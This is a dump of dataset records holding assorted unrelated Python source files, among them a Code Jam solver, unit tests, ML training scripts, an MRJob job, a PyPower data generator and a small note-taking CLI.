summary[\"number_of_PTMs\"],summary[\"number_of_sequence_varients\"],\n summary[\"number_of_splice_varients\"],\n )\n return string_rep\n\n def __repr__(self)->str: \n \"\"\"\n :return: A formated print statement for the class \n :rtype: str\n \"\"\"\n return str(self)\n ","sub_path":"library/IPTK/Classes/Features.py","file_name":"Features.py","file_ext":"py","file_size_in_byte":30284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410484465","text":"import os\r\nimport re\r\nimport math\r\nfrom collections import deque\r\nimport heapq\r\nimport time\r\n\r\n\r\ndef gcd(a, b):\r\n if b == 0:\r\n return a\r\n else:\r\n return gcd(b, a % b)\r\n\r\n\r\ndef func(p, q):\r\n m = gcd(p, q)\r\n p, q = int(p / m), int(q / m)\r\n if int(math.pow(2, int(math.log2(q)))) != q:\r\n return -1\r\n ans = 0\r\n while (q >> 1) > 0:\r\n if p >= q:\r\n break\r\n else:\r\n ans += 1\r\n q = (q >> 1)\r\n return ans\r\n\r\n# def function():\r\n# return False\r\n\r\n\r\ndef main(fin, fout):\r\n start = time.clock()\r\n fin = open(fin, 'r')\r\n fout = open(fout, 'w')\r\n k = int(fin.readline())\r\n for i in range(k):\r\n p, q = [int(w) for w in fin.readline().split('/')]\r\n ans = func(p, q)\r\n\r\n fout.write('Case #' + str(i + 1) + ': ')\r\n if ans == -1:\r\n fout.write('impossible' + '\\n')\r\n else:\r\n fout.write(str(ans) + '\\n')\r\n\r\n if i % 10 == 9:\r\n print('Case #' + str(i + 1) + '/' + str(k) + ' ' + 'finished, %.3f' % (time.clock() - start) + ' sec taken')\r\n\r\n fin.close()\r\n fout.close()\r\n pass\r\n\r\nif __name__ == '__main__':\r\n problem = 'A'\r\n _fin = problem + '/A-large.in'\r\n _fout = _fin[:-2] + 'out'\r\n main(_fin, 
_fout)\r\n","sub_path":"solutions_5706278382862336_1/Python/lliquid/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227035398","text":"import unittest\nimport props\nfrom google.appengine.ext import testbed\nfrom summoner_api_client import SummonerAPIClient\n\nclass SummonerAPIClientTest(unittest.TestCase):\n \"\"\"Test for Summoner API Client\"\"\"\n\n def setUp(self):\n \"\"\"Init client for test\"\"\"\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_urlfetch_stub()\n self.client = SummonerAPIClient(\"oce\", props.get_config().lol_api_key)\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def test_by_name(self):\n \"\"\"Test fetch by summoner name\"\"\"\n summoner = self.client.by_name(\"Minicat\")\n self.assertEqual(summoner.name, \"Minicat\")\n self.assertEqual(summoner.summonerLevel, 30)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"server/api/lol/raw_client/summoner_api_client_test.py","file_name":"summoner_api_client_test.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564828249","text":"from collections import defaultdict\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn\n\nocc_counts = defaultdict(int)\nmulti = True\n\nif multi:\n train_txt = '../annotations/train_anns_new.csv'\nelse:\n train_txt = '../annotations/train_anns_new.csv' # same file either way; this branch previously assigned it to AP_txt by mistake\n\n\nif multi:\n AP_txt = './csv_retinanet_1_02_multi.txt'\nelse:\n AP_txt = './csv_retinanet_12_35_thresh.txt'\n\n\nwith open(train_txt) as f: # was open(multi), which passed a bool to open()\n for line in f:\n seen = set()\n category = line.split(',')[-1].split('\\n')[0]\n occ_counts[category] += 1\n seen.add(category)\n if multi:\n category2 = line.split(',')[-2]\n if category2 != 'None' and category2 not in seen:\n occ_counts[category2] += 1\n seen.add(category2)\n category3 = line.split(',')[-3]\n if category3 != 'None' and category3 not in seen:\n occ_counts[category3] += 1\n\n\nbody_parts = ['n05564590_hand', 'n05563770_arm', 'n05216365_body', 'n05600637_face', 'n05538625_head', 'n05566504_finger', 'n05254795_hair', 'n05560787_leg', 'n05302499_mouth', 'n05305806_lip']\nword_with_synonyms = ['n14844693_soil', 'n01320872_female', 'n09225146_body_of_water']\n\n\nAPs = []\noccurances = []\ncolors = []\nwith open(AP_txt) as f:\n for line in f:\n category, AP = line.split(',')\n if occ_counts[category] < 5000:\n if category in body_parts:\n colors.append('green')\n elif category in word_with_synonyms:\n colors.append('blue')\n else:\n colors.append('red')\n APs.append(float(AP))\n occurances.append(occ_counts[category])\n\nprint(min(occurances))\n\nseaborn.regplot(occurances, APs, n_boot=100, robust=True)\nplt.scatter(occurances, APs, color=colors)\nplt.show()\n\n\n\n\n","sub_path":"data_visualization/training_v_AP.py","file_name":"training_v_AP.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"359610001","text":"import unittest\nimport unittest.mock as mock\nimport re\nfrom fints2ledger.ledger_converter import LedgerConverter\nfrom fints2ledger.ledger_converter import fill\nfrom fints2ledger.ledger_converter import print_transaction\nfrom fints2ledger.ledger_converter import get_remaining_prompts_from_prefill\n\n\nclass LedgerConverterTest(unittest.TestCase):\n def 
setUp(self):\n config = {\"ledger\": {\"md5\": [\"date\", \"payee\", \"purpose\", \"amount\"]}}\n self.writer = LedgerConverter(config)\n\n def test_write_to_ledger(self):\n expected_entry = \"\"\"\\\n2018/03/19 someone some kind of credit some description\n ; md5sum: e7224d45e6102ad5cb5fc7587ffee349\n test:debit EUR 535.0\n test:credit EUR -535.0\n\"\"\"\n data = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"some description\",\n \"debit_account\": \"test:debit\",\n \"credit_account\": \"test:credit\"\n }\n\n actual_entry = self.writer.journal_entry(data)\n\n self.assertEquals(expected_entry, actual_entry)\n\n def test_missing_autocomplete_file(self):\n with mock.patch(\"fints2ledger.ledger_converter.input\", return_value=\"some entry\", create=True):\n try:\n self.writer.prompt_for_input(\"inputPromptWithoutFile\")\n except KeyError:\n pass\n else:\n return\n self.fail(\n \"prompt_for_input shouldn't raise error when prompting for input without a matching autocomplete file.\")\n\n def test_should_fill_when_regex_matches(self):\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\"},\n \"fill\": {\"credit_account\": \"expenses:daily:groceries\"}\n }\n ]\n transaction = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"Thank you for your purchase at SUPERMARKET\",\n }\n\n result = fill(transaction, prefill_config)\n\n self.assertEquals(\n result, {\"credit_account\": \"expenses:daily:groceries\"})\n\n def test_should_not_fill_None_values(self):\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\"},\n \"fill\": {\"credit_account\": \"expenses:daily:groceries\", \"purpose\": None}\n }\n ]\n transaction = {\n \"date\": \"2018/03/19\",\n \"amount\": \"535\",\n \"currency\": \"EUR\",\n \"payee\": \"someone\",\n \"posting\": \"some kind of credit\",\n \"purpose\": \"Thank you for your purchase at SUPERMARKET\",\n }\n\n result = fill(transaction, prefill_config)\n\n self.assertEquals(\n result, {\"credit_account\": \"expenses:daily:groceries\"})\n\n def test_should_only_fill_when_all_matches_match(self):\n credit_account_key = \"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*VACATION.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\"}\n }\n ]\n matching_transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n other_transaction = {\n \"payee\": \"spouse\",\n \"purpose\": \"VACATION on an island\",\n }\n\n matching_result = fill(matching_transaction, prefill_config)\n other_result = fill(other_transaction, prefill_config)\n\n self.assertEquals(matching_result, {\n \"credit_account\": \"expenses:vacation\"})\n self.assertEquals(other_result, {})\n \n def test_should_list_None_prefills_as_remaining_prompts(self):\n credit_account_key = \"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*VACATION.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\", \"purpose\": None}\n }\n ]\n transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n\n self.assertEquals(get_remaining_prompts_from_prefill(transaction, prefill_config), [\"purpose\"])\n\n \n def test_should_return_None_if_transaction_is_not_matching(self):\n credit_account_key = 
\"credit_account\"\n prefill_config = [\n {\n \"match\": {\"purpose\": \".*SUPERMARKET.*\", \"payee\": \"vacation_company\"},\n \"fill\": {credit_account_key: \"expenses:vacation\", \"purpose\": None}\n }\n ]\n transaction = {\n \"payee\": \"vacation_company\",\n \"purpose\": \"VACATION on an island\",\n }\n\n self.assertEquals(get_remaining_prompts_from_prefill(transaction, prefill_config), None)\n\n\n @mock.patch(\"fints2ledger.ledger_converter.print\")\n def test_prints_transaction_in_uncidoe(self, mock_print):\n print_transaction({\n \"purpose\": \"😀\"\n })\n self.assertIn(\"😀\", mock_print.call_args_list[0][0][0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"fints2ledger/test/test_ledger_converter.py","file_name":"test_ledger_converter.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"637868816","text":"def countdown(i):\n print(i)\n if i < 1:\n return\n else:\n countdown(i - 1)\n\n\ndef greet(name):\n print(\"Hello,\" + name + \"!\")\n greet2(name)\n print(\"getting ready to say bye...\")\n bye()\n\n\ndef greet2(name):\n print(\"how are you,%s?\" % name)\n\n\ndef bye():\n print(\"ok bye!\")\n\n\n# greet(\"maggie\")\n\n# 汉诺塔\ndef move(n, a, b, c):\n global i\n i += 1\n if n == 1:\n print(a, \"-->\", c)\n\n else:\n move(n-1, a, c, b)\n print(a, \"-->\", c)\n move(n-1, b, a, c)\n\n\ni = 0\nmove(3, 'a', 'b', 'c')\nprint(i)\n","sub_path":"others/3.1 递归.py","file_name":"3.1 递归.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"458621620","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\n\n\ndef train_baseline(train_data, epochs, model, optimizer, criterion):\n for epoch in range(epochs): # loop over the dataset multiple times\n print(epoch)\n for i in range(len(train_data)):\n # get the inputs; data is a list of [inputs, labels]\n data = train_data[i]\n inputs = data['image'].unsqueeze(0)\n classes = data['class'].unsqueeze(0).unsqueeze(0)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model(inputs)\n loss = criterion(outputs, classes)\n loss.backward()\n optimizer.step()\n\n print('Finished Training')\n return model","sub_path":"Train_Utils/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"99674955","text":"import os, json\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport numpy as np\nimport gym\n\ndef save_params(path, params):\n '''Saves parametes to the path as json\n creates a desired folder if it not exists\n prints out the path upon completion\n '''\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, 'w') as out:\n out.write(json.dumps(params, separators=(',\\n','\\t:\\t'), sort_keys=True))\n print ('Data saved to ' + path)\n\ndef rollout(policy_fn, env, max_steps = 1000, render = False):\n '''Rolls out a policy on an environment until copletion of the episode\n returns : observations, actions, total reward\n '''\n observations, actions = [],[]\n obs = env.reset()\n done = False\n totalr = 0.\n steps = 0\n while not done:\n action = policy_fn(obs[None,:])\n observations.append(obs)\n actions.append(action)\n obs, r, done, _ = 
env.step(action)\n totalr += r\n steps += 1\n if render:\n env.render()\n if steps >= max_steps:\n break\n\n return np.array(observations).reshape(len(observations),-1), np.array(actions).reshape(len(actions),-1), totalr\n\ndef train_model(hidden_size, obs, act, patience, model = None):\n '''\n Trains a model of 2 layer of specified size\n on provided observation-action samples with\n given the patience of early stopping\n each epoch will contain 20k samples(created by repeating)\n returns model and some training data\n '''\n if not model:\n model = tf.keras.Sequential([\n layers.Dense(hidden_size, activation='sigmoid', input_shape=(obs.shape[1],)),\n layers.Dense(hidden_size, activation='sigmoid'),\n layers.Dense(act.shape[1])])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.001),\n loss='mse',\n metrics=['mse'])\n\n es = tf.keras.callbacks.EarlyStopping(patience=patience, monitor='loss')\n\n dataset = tf.data.Dataset.from_tensor_slices((obs, act))\n dataset = dataset.repeat()\n dataset = dataset.shuffle(buffer_size=500)\n dataset = dataset.batch(32)\n \n history = model.fit(dataset, epochs=1000, steps_per_epoch=625, callbacks=[es])\n\n training_data = dict(hidden_size = hidden_size, epochs = es.stopped_epoch, mse = history.history['loss'][-1], patience = patience)\n\n return model, training_data\n\n\ndef test_model(model, env , num_rollouts = 20, max_steps = 1000):\n '''\n Tests model on an environment for the specified number\n of rollouts and returns the test results\n '''\n returns = []\n obs_set = []\n act_set = []\n for i in range(num_rollouts):\n print('Rollout ', i+1)\n o, a, totalr = rollout(model.predict, env, max_steps)\n returns.append(totalr)\n\n print('mean return', np.mean(returns))\n print('std of return', np.std(returns))\n\n test_data = dict(Returns = returns)\n \n return test_data \n \n\nif __name__ == '__main__':\n\n ### This code will train the Behavioral Cloning agent on the expert data\n ### And test it for the provided number of runs. Data will be saved in\n ### BC_models folder\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('envname', type=str)\n parser.add_argument('hidden_size', type = int, default = 256)\n parser.add_argument('--patience', type=int, default=3,\n help='Patience of early stopping. Default = 3')\n parser.add_argument('--num_tests', type=int, default=20,\n help='Number test runs of the learned policy. 
Default = 20')\n args = parser.parse_args()\n\n # Getting the expert policy samples\n with open(os.path.join('expert_data', args.envname + '.pkl'), 'rb') as f:\n expert_data = pickle.load(f)\n obs, act = expert_data.values()\n obs, act = obs.reshape(len(obs), -1) , act.reshape(len(act), -1)\n\n model_path = os.path.join('BC_models', args.envname+ '_' + str(args.hidden_size)+'.h5')\n data_path = os.path.join('BC_models', args.envname+ '_' + str(args.hidden_size)+'.json')\n\n model, training_data = train_model(args.hidden_size, obs, act, args.patience)\n training_data[\"model_path\"] = model_path\n\n if args.num_tests:\n env = gym.make(args.envname)\n test_data = test_model(model, env, num_rollouts = args.num_tests)\n training_data.update(test_data)\n\n save_params(data_path, training_data)\n model.save(model_path)\n\n\n\n\n\n","sub_path":"hw1/BC.py","file_name":"BC.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62568981","text":"#Python HW 1, problem 2, min max calc\n\n\n\nnumInputs = int(input())\n\nfor inputInd in range(numInputs):\n currentInput = (input())#read input line\n currentInput = currentInput.split(' ')#split to a list by the spaces\n currentNumbers = [int(i) for i in currentInput]#covert strings to ints\n currMax = currentNumbers[0]\n currMin = currentNumbers[0]\n for num in currentNumbers:\n if (num > currMax ):\n currMax = num\n if (num None:\n if override_dict:\n for key, value in override_dict.items():\n if not hasattr(self, key):\n raise KeyError(\"unknown argument\")\n setattr(self, key, value)\n self._post_init_processing()\n return\n\n def _post_init_processing(self) -> None:\n self.game_name = self.game.__name__.split('.')[-1]\n self.game_type = self.game.__name__.split('.')[-2]\n if not self.use_latent_embedding and self.train_setting == 'implicit_ensemble':\n for i in range(10):\n print('----------------------------------------')\n print('Warning: config line 60, gaussian latent noise not used !!!!!')\n print('----------------------------------------')\n\ndef is_adversary(agent_id: str) -> bool:\n return (('adversary' in agent_id)\n or agent_id.startswith('eve')\n or agent_id.startswith('player_1')\n or ('second' in agent_id))\n\ndef get_config(args: Args):\n # num_rollouts = 2\n ModelCatalog.register_custom_model(\"SoftModularActorCriticNet\", SoftModularActorCriticNet)\n ModelCatalog.register_custom_model(\"SimpleEnsembleActorCriticNet\", SimpleEnsembleActorCriticNet)\n # 1. Gets default training configuration and specifies the POMgame to load.\n config = deepcopy(get_agent_class(args.alg_name)._default_config)\n\n # 2. Set environment config. 
This will be passed to\n # the env_creator function via the register env lambda below.\n # local_ratio specifies the ratio between global reward and the local reward\n # config[\"env_config\"] = {\"local_ratio\": 0.5}\n def env_creator():\n if args.game.__package__.endswith('atari'):\n if (args.game_name.startswith('foozpong') or\n args.game_name.startswith('basketball_pong') or\n args.game_name.startswith('volleyball_pong')\n ):\n env = args.game.env(obs_type=args.atari_obs_type,\n max_cycles=args.max_steps['atari'],\n full_action_space=False,\n num_players=2)\n else:\n env = args.game.env(obs_type=args.atari_obs_type,\n full_action_space=False,\n max_cycles=args.max_steps['atari'])\n env = frame_skip_v0(env, args.atari_frame_skip_num)\n env = frame_stack_v1(env, args.atari_frame_stack_num)\n\n else:\n env = args.game.env()\n if args.game_name.startswith('rps'):\n env = one_hot_obs_wrapper(env)\n env = dtype_v0(env, dtype=float32)\n env = pad_observations_v0(env)\n env = pad_action_space_v0(env)\n if args.game_name.startswith('connect_four') or args.game_name.startswith('tictactoe'):\n env = FlattenEnvWrapper(env)\n GAUSSIAN_STD = 1.0\n assert abs(GAUSSIAN_STD - 1.0) < 1e-5, \"must be 1.0, otherwise simple ensemble implementation is wrong\"\n env = LatentGaussianAugmentedEnvWrapper(env,\n latent_parameter_dim=args.latent_para_dim,\n gaussian_std=1.0,\n use_dict_obs_space=args.use_dict_obs_space)\n return env\n\n # 3. Register env, and get trainer_class\n register_env(args.game_name,\n lambda config: PettingZooEnv(env_creator()))\n trainer_class = get_agent_class(args.alg_name)\n\n # 4. Extract space dimensions\n test_env = PettingZooEnv(env_creator())\n obs_space = test_env.observation_space\n act_space = test_env.action_space\n agents_id = test_env.agents\n print(f\"obs_space: {obs_space}; act_space: {act_space}\")\n\n # 5. 
Configuration for multiagent setup:\n config[\"framework\"] = \"torch\"\n config[\"num_gpus\"] = 0\n config[\"log_level\"] = \"INFO\"\n config[\"num_workers\"] = args.num_cpus // 2\n config[\"num_cpus_per_worker\"] = 1\n config['num_envs_per_worker'] = 5\n # Fragment length, collected at once from each worker and for each agent!\n config[\"rollout_fragment_length\"] = 100\n # Training batch size -> Fragments are concatenated up to this point.\n config[\"train_batch_size\"] = 2000\n config[\"sgd_minibatch_size\"] = 256\n config[\"entropy_coeff\"] = 0.01\n config[\"lambda\"] = 0.9\n config[\"vf_clip_param\"] = 50\n config[\"num_sgd_iter\"] = 10\n # After n steps, force reset simulation\n config[\"horizon\"] = args.max_steps[args.game_type]\n # Default: False\n config[\"no_done_at_end\"] = False\n # Info: If False, each agents trajectory is expected to have\n # maximum one done=True in the last step of the trajectory.\n # If no_done_at_end = True, environment is not resetted\n # when dones[__all__]= True.\n config['ignore_worker_failures'] = True\n\n def get_main_and_test_config(config: Dict[str, Any]) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n\n main_policies = {}\n for i, agent_id in enumerate(agents_id):\n for j in range(1):\n main_policies[f'{agent_id}_{j}'] = (PPOTorchPolicy,\n obs_space,\n act_space,\n {\"framework\": \"torch\"})\n test_policies = {\n 'test_' + agent_id: (PPOTorchPolicy, obs_space, act_space, {\"framework\": \"torch\"})\n for agent_id in agents_id if is_adversary(agent_id)\n }\n policies = {**main_policies, **test_policies}\n\n main_config, test_config = deepcopy(config), deepcopy(config)\n\n main_config[\"multiagent\"] = {\n \"policies\": policies,\n \"policy_mapping_fn\": lambda agent_id: f'{agent_id}_{0}',\n \"policies_to_train\": list(main_policies.keys())\n }\n\n def test_config_policy_mapping(agent_id: str) -> str:\n if is_adversary(agent_id):\n return 'test_' + agent_id\n return f'{agent_id}_{0}'\n\n test_config[\"multiagent\"] = {\n \"policies\": policies,\n \"policy_mapping_fn\": test_config_policy_mapping,\n \"policies_to_train\": list(test_policies.keys())\n }\n return main_config, test_config\n\n def get_simple_ensemble_training_config(config: Dict[str, Any], ensemble_size: int=3) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n if ensemble_size > 1:\n config[\"model\"] = {\n \"custom_model\": \"SimpleEnsembleActorCriticNet\",\n \"custom_model_config\": {\n \"use_dict_obs_space\": args.use_dict_obs_space,\n 'ensemble_size': ensemble_size\n }\n }\n main_config, test_config = get_main_and_test_config(config)\n return main_config, test_config\n\n def get_implicit_ensemble_training_config(config: Dict[str, Any]) -> Tuple[Dict[str, Any],\n Dict[str, Any]]:\n config[\"model\"] = {\n \"custom_model\": \"SoftModularActorCriticNet\",\n \"custom_model_config\": {\n \"use_latent_embedding\": args.use_latent_embedding,\n \"use_dict_obs_space\": args.use_dict_obs_space,\n \"base_type\": MLPBase,\n \"em_input_shape\": args.latent_para_dim,\n \"emb_shaping_net_hidden_shapes\": args.emb_shaping_net_hidden_shapes,\n 'emb_shaping_net_last_softmax': args.emb_shaping_net_last_softmax,\n 'em_hidden_shapes': [args.soft_modular_net_hidden_dim,\n args.soft_modular_net_hidden_dim], #[400],\n 'hidden_shapes': [args.soft_modular_net_hidden_dim,\n args.soft_modular_net_hidden_dim], #[400, 400],\n 'num_layers': args.soft_modular_net_num_layers, #4,\n 'num_modules': args.soft_modular_net_num_modules, #4,\n 'module_hidden': args.soft_modular_net_hidden_dim, #128,\n 'gating_hidden': 
args.soft_modular_net_hidden_dim, #256,\n 'num_gating_layers': 2, #with 1 gating layer, 500 step works for simple_spread\n 'add_bn': False,\n }\n }\n main_config, test_config = get_main_and_test_config(config)\n return main_config, test_config\n\n if args.train_setting == 'single_policy':\n main_config, test_config = get_simple_ensemble_training_config(config, ensemble_size=1)\n elif args.train_setting == 'simple_ensemble':\n main_config, test_config = get_simple_ensemble_training_config(config, ensemble_size=3)\n else:\n assert args.train_setting == 'implicit_ensemble'\n main_config, test_config = get_implicit_ensemble_training_config(config)\n\n return trainer_class, test_env, main_config, test_config","sub_path":"IET_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"566544261","text":"\"\"\"\n@author: krakowiakpawel9@gmail.com\n@site: e-smartdata.org\n\"\"\"\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\n# import nltk\nimport re\n\n# nltk.download('stopwords')\n\n# $ python 04_top_20_common_adjective.py -r emr --num-core-instances 4 prep_reviews.tsv --output-dir=s3://big-data-hadoop/output/job3\n\nWORD_RE = re.compile(r\"[\\w]+\")\n\nlemmatizer = WordNetLemmatizer()\nstop_words = stopwords.words('english')\n\n\nclass MRFood(MRJob):\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper),\n MRStep(mapper=self.mapper_get_keys,\n reducer=self.reducer),\n MRStep(mapper=self.mapper_get_1_and_5,\n reducer=self.reducer_get_20_words)\n ]\n\n def mapper(self, _, line):\n (Id, ProductId, UserId, ProfileName, HelpfulnessNumerator, HelpfulnessDenominator,\n Score, Time, Summary, Text) = line.split('\\t')\n words = WORD_RE.findall(Text)\n words = filter(lambda word: len(word) > 1, words)\n words = map(str.lower, words)\n words = map(lemmatizer.lemmatize, words)\n words = filter(lambda word: word not in stop_words, words)\n for word in words:\n if pos_tag([word])[0][1] == 'JJ':\n yield Score, word\n\n def mapper_get_keys(self, key, value):\n yield (key, value), 1\n\n def reducer(self, key, values):\n yield key, sum(values)\n\n def mapper_get_1_and_5(self, key, value):\n if key[0] == '1':\n yield key[0], (key[1], value)\n if key[0] == '5':\n yield key[0], (key[1], value)\n\n def reducer_get_20_words(self, key, values):\n results = {}\n for value in values:\n results[value[0]] = value[1]\n sorted_results = sorted([(val, key) for key, val in results.items()], reverse=True)\n\n yield key, sorted_results[:20]\n\n\nif __name__ == '__main__':\n MRFood.run()\n","sub_path":"06_food_reviews/04_top_20_common_adjective.py","file_name":"04_top_20_common_adjective.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495984582","text":"from pypower.api import case300, ppoption, runpf, printpf, runopf, case9\nfrom constants import *\nimport numpy as np\nimport os\nfrom data_utils import *\nfrom tqdm import tqdm\n# See http://rwl.github.io/PYPOWER/api/ for description of variables\n\n# To install pypower, see https://www.pypsa.org/doc/installation.html\n\nsave_dir = \"case300_data/\"\ntry:\n # Create target Directory\n os.mkdir(save_dir)\n print(\"Directory \" , save_dir , \" Created \") \nexcept FileExistsError:\n print(\"Directory \" , save_dir , \" already 
exists\")\n\nMAX_ITERS = 50000\n\nac_ppopt = ppoption(PF_ALG=2, VERBOSE=0, OUT_ALL= -1, OUT_SYS_SUM=False, OUT_BUS = False, OUT_BRANCH = False, OUT_GEN = False, PF_DC=False, OUT_ALL_LIM=0)\ndc_ppopt = ppoption(PF_ALG=2, VERBOSE=0, OUT_ALL= -1, OUT_SYS_SUM=False, OUT_BUS = False, OUT_BRANCH = False, OUT_GEN = False, PF_DC=True, OUT_ALL_LIM=0)\n\ni = 0\n\nwhile i < MAX_ITERS:\n if i % 100:\n print(\"Iter: %d/%d\" % (i, MAX_ITERS))\n ppc = case300()\n new_pd = ppc['bus'][:,PD]\n new_pd += (np.random.rand(len(new_pd))-0.5)*new_pd\n new_qd = ppc['bus'][:, QD]\n new_qd += (np.random.rand(len(new_qd))-0.5)*new_qd\n ppc['bus'][:,PD] = new_pd\n ppc['bus'][:,QD] = new_qd\n \n # Run AC Powerflow\n ac_result = runopf(ppc, ac_ppopt)\n ac_outfile = \"%s/ac_result_%d\" % (save_dir, i)\n \n # Check AC solved correctly\n if ac_result['success'] == False:\n continue\n\n # Run DC Powerflow\n dc_result = runopf(ppc, dc_ppopt)\n dc_outfile = \"%s/dc_result_%d\" % (save_dir, i)\n\n # Check DC solved correctly\n if dc_result['success'] == False:\n continue\n \n # Write to file\n np.save(dc_outfile, ac_result)\n np.save(ac_outfile, dc_result)\n i = i + 1\n\n\n","sub_path":"code/generate_data300.py","file_name":"generate_data300.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"85627539","text":"# mysite/routing.py\nfrom channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nfrom django.urls import re_path\n#from cons import consumers \n\nwebsocket_urlpatterns = [\n re_path(r'ws/path/(?P\\w+)/$', consumers.basicConsumer),\n]\n\napplication = ProtocolTypeRouter({\n 'websocket': AuthMiddlewareStack(\n URLRouter(\n websocket_urlpatterns\n )\n ),\n})","sub_path":"backend_for_reference/src/backend/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"365410334","text":"import os\nimport time\nfrom datetime import datetime\nimport json\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nANM = []\n\nos.system(\"title ANM\")\n\n\ndef save():\n global ANM\n try:\n with open('ANM.json', 'w') as f:\n json.dump(ANM, f)\n except:\n pass\n\n\ndef load():\n global ANM\n try:\n with open('ANM.json', 'r') as f:\n ANM = json.load(f)\n except:\n ANM = []\n save()\n\ndef clear():\n os.system(\"cls\")\n\n\ndef StringSplitList(x,y):\n string=\"\"\n firstLoop = True\n for i in x:\n if firstLoop == True:\n string+=str(i)\n else:\n string+=str(y)+str(i)\n firstLoop = False\n return(string)\n\n\ndef StringifyList(x):\n nstr = \"\"\n for i in x:\n try:\n nstr = nstr+str(x[i])\n except:\n pass\n return(nstr)\n\n\ndef getDate():\n year = time.strftime(\"%Y\")\n day = time.strftime(\"%d\")\n month = time.strftime(\"%m\")\n return([year,month,day])\n\ndef view():\n if len(ANM) <= 0:\n print(\"Theres nothing to view!\")\n input()\n menu(\"start\")\n else:\n clear()\n for i in range(0,len(ANM)):\n firstIrit = True\n print(ANM[i][0])\n for y in ANM[i]:\n if firstIrit == True:\n firstIrit = False\n else:\n print(\" \"+str(y))\n input()\n menu(\"start\")\n\n\ndef add():\n global ANM\n clear()\n print(\"-\"*20)\n print(\"[1]: Add User\")\n print(\"[2]: Add Entry\")\n print(\"[3]: Return\")\n print(\"-\"*20)\n choice = input(\"[]>\")\n try:\n choice = int(choice)\n except:\n add()\n\n if choice == 2:\n if len(ANM) <= 0:\n print(\"Theres nothing to add to!\")\n input()\n 
